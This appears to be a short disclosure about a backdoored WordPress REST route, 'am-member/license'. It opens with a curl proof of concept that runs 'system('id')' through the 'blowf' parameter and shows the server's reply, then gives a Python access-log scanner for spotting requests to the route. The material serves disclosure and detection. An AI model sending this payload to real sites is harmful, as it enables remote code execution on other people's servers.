$ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
WPScan already supports scanning for this:
https://wpscan.com/vulnerability/e2d546c9-85b6-47a4-b951-781b9ae5d0f2
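
A log check for the route requested above, as an added example (not code from the original page or from WPScan). It assumes Combined Log Format access logs; the sample lines and all function names are constructed for illustration. It also covers the `?rest_route=` and `/index.php/wp-json/` forms through which WordPress serves the same REST route.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

ROUTE = "/am-member/license"  # REST route taken from the request shown above

# Assumed Combined Log Format: ip - user [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def rest_route(target):
    """Return the REST route a request target resolves to, or None."""
    parts = urlsplit(target)
    path = re.sub(r"/{2,}", "/", unquote(parts.path))
    m = re.search(r"/wp-json(/.*)$", path)        # /wp-json/... and /index.php/wp-json/...
    if m:
        return m.group(1).rstrip("/") or "/"
    qs = parse_qs(parts.query)                    # parse_qs already percent-decodes
    if "rest_route" in qs:                        # plain-permalink form: /?rest_route=/ns/route
        return qs["rest_route"][0].rstrip("/") or "/"
    return None

def find_hits(lines):
    """Flag every request to ROUTE, whatever the method or status.
    Access logs do not record POST bodies, so the blowfish/blowf parameters
    are not visible here; a hit on the route is the signal to investigate."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, method, target, status = m.groups()
        route = rest_route(target)
        if route and route.lower() == ROUTE:      # compare case-insensitively
            hits.append({"ip": ip, "time": ts, "method": method,
                         "status": int(status), "target": target})
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jan/2022:10:00:01 +0000] "POST /wp-json/am-member/license HTTP/1.1" 200 54 "-" "curl/7.68.0"
198.51.100.7 - - [10/Jan/2022:10:00:05 +0000] "POST /?rest_route=%2Fam-member%2Flicense HTTP/1.1" 200 54 "-" "curl/7.68.0"
203.0.113.9 - - [10/Jan/2022:10:01:00 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2022:10:02:00 +0000] "POST /index.php/wp-json/AM-Member/license/ HTTP/1.1" 404 0 "-" "-"
""".splitlines()

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["method"], hit["status"], hit["target"])
```

A 200 response on this route means the handler is registered on the site; a 404 only shows that someone probed for it.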